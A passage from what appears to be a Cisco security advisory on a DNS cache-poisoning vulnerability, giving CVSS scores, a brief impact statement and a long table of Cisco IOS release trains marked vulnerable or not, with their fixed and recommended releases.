Partial\n\nCVSS Temporal Score - 5.3\n    Exploitability -           Functional\n    Remediation Level -        Official-Fix\n    Report Confidence -        Confirmed\n\n(same score for the three Cisco bugs listed above.)\n\nImpact\n======\n\nSuccessful exploitation of the vulnerability described in this document\nmay result in invalid hostname-to-IP address mappings in the cache of an\naffected DNS server. This may lead users of this DNS server to contact\nthe wrong provider of network services. The ultimate impact varies\ngreatly, ranging from a simple denial of service (for example, making\nwww.example.com resolve to 127.0.0.1) to phishing and financial fraud. \n\nSoftware Versions and Fixes\n===========================\n\nWhen considering software upgrades, also consult\nhttp://www.cisco.com/go/psirt and any subsequent advisories to determine\nexposure and a complete upgrade solution. \n\nIn all cases, customers should exercise caution to be certain the\ndevices to be upgraded contain sufficient memory and that current\nhardware and software configurations will continue to be supported\nproperly by the new release. If the information is not clear, contact\nthe Cisco Technical Assistance Center (TAC) or your contracted\nmaintenance provider for assistance. \n\nCisco IOS Software\n+-----------------\n\nEach row of the Cisco IOS Software table (below) names a Cisco IOS\nSoftware release train. If a given release train is vulnerable, then\nthe earliest possible releases that contain the fix (along with the\nanticipated date of availability for each, if applicable) are listed in\nthe \"First Fixed Release\" column of the table. The \"Recommended Release\"\ncolumn indicates the releases which have fixes for all the published\nvulnerabilities at the time of this Advisory. A device running a release\nin the given train that is earlier than the release in a specific column\n(less than the First Fixed Release) is known to be vulnerable. Cisco\nrecommends upgrading to a release equal to or later than the release in\nthe \"Recommended Releases\" column of the table. \n\n+----------------------------------------+\n|   Major    |        Availability of    |\n|  Release   |     Repaired Releases     |\n|------------+---------------------------|\n|  Affected  | First Fixed | Recommended |\n| 12.0-Based |   Release   |   Release   |\n|  Releases  |             |             |\n|------------+-------------+-------------|\n| 12.0       | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0DA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.0(7)DB   |             |\n|            | are         |             |\n|            | vulnerable, | 12.4(19a)   |\n| 12.0DB     | release     |             |\n|            | 12.0(7)DB   | 12.4(19b)   |\n|            | and later   |             |\n|            | are not     |             |\n|            | vulnerable; |             |\n|            | first fixed |             |\n|            | in 12.4     |             |\n|------------+-------------+-------------|\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.0(7)DC   |             |\n|            | are         |             |\n|            | vulnerable, | 12.4(19a)   |\n| 12.0DC     | release     |             |\n|            | 12.0(7)DC   | 12.4(19b)   |\n|            | and later   |             |\n|            | are not     |             |\n|            | vulnerable; |             |\n|            | first fixed |             |\n|            | in 12.4     |             |\n|------------+-------------+-------------|\n| 12.0S      | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0SC     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0SL     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0SP     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0ST     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0SX     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0SY     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0SZ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.0T      | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.0W      | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0WC     | Vulnerable; |             |\n|            | contact TAC |             |\n|------------+-------------+-------------|\n| 12.0WT     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0XA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0XB     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0XC     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0XD     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Note:       |             |\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.0(7)XE1  |             |\n|            | are         |             |\n| 12.0XE     | vulnerable, |             |\n|            | release     |             |\n|            | 12.0(7)XE1  |             |\n|            | and later   |             |\n|            | are not     |             |\n|            | vulnerable; |             |\n|------------+-------------+-------------|\n| 12.0XF     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0XG     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0XH     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0XI     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0XJ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.0(7)XK2  |             |\n|            | are         |             |\n|            | vulnerable, | 12.4(19a)   |\n| 12.0XK     | release     |             |\n|            | 12.0(7)XK2  | 12.4(19b)   |\n|            | and later   |             |\n|            | are not     |             |\n|            | vulnerable; |             |\n|            | first fixed |             |\n|            | in 12.4     |             |\n|------------+-------------+-------------|\n| 12.0XL     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0XM     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0XN     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0XQ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.0(7)XR1  |             |\n|            | are         |             |\n|            | vulnerable, | 12.4(19a)   |\n| 12.0XR     | release     |             |\n|            | 12.0(7)XR1  | 12.4(19b)   |\n|            | and later   |             |\n|            | are not     |             |\n|            | vulnerable; |             |\n|            | first fixed |             |\n|            | in 12.4     |             |\n|------------+-------------+-------------|\n| 12.0XS     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0XV     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.0XW     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|  Affected  | First Fixed | Recommended |\n| 12.1-Based |   Release   |   Release   |\n|  Releases  |             |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.1       | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.1AA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1AX     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.1(22)AY1 |             |\n|            | are         |             |\n| 12.1AY     | vulnerable, | 12.1(22)    |\n|            | release     | EA11        |\n|            | 12.1(22)AY1 |             |\n|            | and later   |             |\n|            | are not     |             |\n|            | vulnerable; |             |\n|------------+-------------+-------------|\n| 12.1AZ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1CX     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1DA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.1(4)DB1  |             |\n|            | are         |             |\n|            | vulnerable, | 12.4(19a)   |\n| 12.1DB     | release     |             |\n|            | 12.1(4)DB1  | 12.4(19b)   |\n|            | and later   |             |\n|            | are not     |             |\n|            | vulnerable; |             |\n|            | first fixed |             |\n|            | in 12.4     |             |\n|------------+-------------+-------------|\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.1(4)DC2  |             |\n|            | are         |             |\n|            | vulnerable, | 12.4(19a)   |\n| 12.1DC     | release     |             |\n|            | 12.1(4)DC2  | 12.4(19b)   |\n|            | and later   |             |\n|            | are not     |             |\n|            | vulnerable; |             |\n|            | first fixed |             |\n|            | in 12.4     |             |\n|------------+-------------+-------------|\n| 12.1E      | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.1(11)EA1 |             |\n|            | are         |             |\n| 12.1EA     | vulnerable, | 12.1(22)    |\n|            | release     | EA11        |\n|            | 12.1(11)EA1 |             |\n|            | and later   |             |\n|            | are not     |             |\n|            | vulnerable; |             |\n|------------+-------------+-------------|\n| 12.1EB     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1EC     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1EO     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1EU     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1EV     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1EW     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Note:       |             |\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.1(8a)EX  |             |\n|            | are         |             |\n| 12.1EX     | vulnerable, |             |\n|            | release     |             |\n|            | 12.1(8a)EX  |             |\n|            | and later   |             |\n|            | are not     |             |\n|            | vulnerable; |             |\n|------------+-------------+-------------|\n| 12.1EY     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1EZ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1GA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1GB     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.1T      | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.1XA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XB     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.1(1)XC1  |             |\n|            | are         |             |\n|            | vulnerable, | 12.4(19a)   |\n| 12.1XC     | release     |             |\n|            | 12.1(1)XC1  | 12.4(19b)   |\n|            | and later   |             |\n|            | are not     |             |\n|            | vulnerable; |             |\n|            | first fixed |             |\n|            | in 12.4     |             |\n|------------+-------------+-------------|\n| 12.1XD     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XE     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XF     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XG     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XH     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XI     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XJ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XK     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XL     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XM     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XN     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XO     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XP     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XQ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XR     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XS     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XT     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XU     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XV     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XW     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XX     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XY     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1XZ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1YA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1YB     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1YC     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1YD     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Note:       |             |\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.1(5)YE1  |             |\n|            | are         | 12.4(19a)   |\n| 12.1YE     | vulnerable, |             |\n|            | release     | 12.4(19b)   |\n|            | 12.1(5)YE1  |             |\n|            | and later   |             |\n|            | are not     |             |\n|            | vulnerable; |             |\n|------------+-------------+-------------|\n| 12.1YF     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1YG     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1YH     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1YI     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.1YJ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|  Affected  | First Fixed | Recommended |\n| 12.2-Based |   Release   |   Release   |\n|  Releases  |             |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2       | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2B      | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.2BC     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2BW     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.2(8)BY   |             |\n|            | are         |             |\n|            | vulnerable, | 12.4(19a)   |\n| 12.2BY     | release     |             |\n|            | 12.2(8)BY   | 12.4(19b)   |\n|            | and later   |             |\n|            | are not     |             |\n|            | vulnerable; |             |\n|            | first fixed |             |\n|            | in 12.4     |             |\n|------------+-------------+-------------|\n| 12.2BZ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2CX     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2CY     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2CZ     | Vulnerable; |             |\n|            | contact TAC |             |\n|------------+-------------+-------------|\n| 12.2DA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2DD     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2DX     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2EU     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2EW     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2EWA    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2EX     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2EY     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2EZ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2FX     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2FY     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2FZ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2IXA    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2IXB    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2IXC    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2IXD    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2IXE    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2IXF    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2JA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2JK     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2MB     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2MC     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2S      | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SB     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SBC    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SCA    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SE     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SEA    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SEB    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SEC    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SED    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SEE    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SEF    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SEG    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SG     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SGA    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SL     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SM     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SO     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SRA    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SRB    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SRC    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SU     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SV     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SVA    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SVC    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SVD    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SW     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SX     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SXA    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SXB    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SXD    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SXE    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SXF    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SXH    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SXI    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SY     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2SZ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2T      | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Releases    |             |\n|            | prior to    |             |\n|            | 12.2(8)     |             |\n|            | TPC10d are  |             |\n|            | vulnerable, |             |\n| 12.2TPC    | release     |             |\n|            | 12.2(8)     |             |\n|            | TPC10d and  |             |\n|            | later are   |             |\n|            | not         |             |\n|            | vulnerable; |             |\n|------------+-------------+-------------|\n| 12.2UZ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2XA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2XB     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2XC     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.2XD     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2XE     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2XF     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2XG     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.2XH     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2XI     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2XJ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2XK     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2XL     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.2XM     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2XN     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2XNA    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2XO     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2XQ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2XR     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2XS     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2XT     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2XU     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.2XV     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2XW     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YB     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YC     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YD     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YE     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YF     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YG     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YH     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2YJ     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.2YK     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2YL     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2YM     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2YN     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.2(18)    |\n|            | migrate to  | SXF15;      |\n| 12.2YO     | any release | Available   |\n|            | in 12.2SY   | on          |\n|            |             | 08-AUG-08   |\n|------------+-------------+-------------|\n| 12.2YP     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YQ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YR     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YS     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2YT     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2YU     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2YV     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.2YW     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YX     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YY     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2YZ     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2ZA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2ZB     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.2ZC     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2ZD     | Vulnerable; |             |\n|            | contact TAC |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2ZE     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2ZF     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            |             | 12.4(19a)   |\n|            |             |             |\n|            | Vulnerable; | 12.4(19b)   |\n| 12.2ZG     | first fixed |             |\n|            | in 12.4T    | 12.4(20)T;  |\n|            |             | Available   |\n|            |             | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            |             | 12.4(19a)   |\n|            |             |             |\n|            | Vulnerable; | 12.4(19b)   |\n| 12.2ZH     | first fixed |             |\n|            | in 12.4     | 12.4(20)T;  |\n|            |             | Available   |\n|            |             | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.2ZJ     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            |             | 12.4(19a)   |\n|            |             |             |\n|            | Vulnerable; | 12.4(19b)   |\n| 12.2ZL     | first fixed |             |\n|            | in 12.4     | 12.4(20)T;  |\n|            |             | Available   |\n|            |             | on          |\n|            |             | 11-JUL-08   |\n|------------+-------------+-------------|\n| 12.2ZP     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2ZU     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2ZY     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.2ZYA    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|  Affected  | First Fixed | Recommended |\n| 12.3-Based |   Release   |   Release   |\n|  Releases  |             |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.3       | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.3B      | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.3BC     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n|            | Vulnerable; | 12.4(19a)   |\n| 12.3BW     | first fixed |             |\n|            | in 12.4     | 12.4(19b)   |\n|------------+-------------+-------------|\n| 12.3EU     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.3JA     | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.3JEA    | Not         |             |\n|            | Vulnerable  |             |\n|------------+-------------+-------------|\n| 12.3JEB    | Not         |             |\n|            | Vulnerable  |             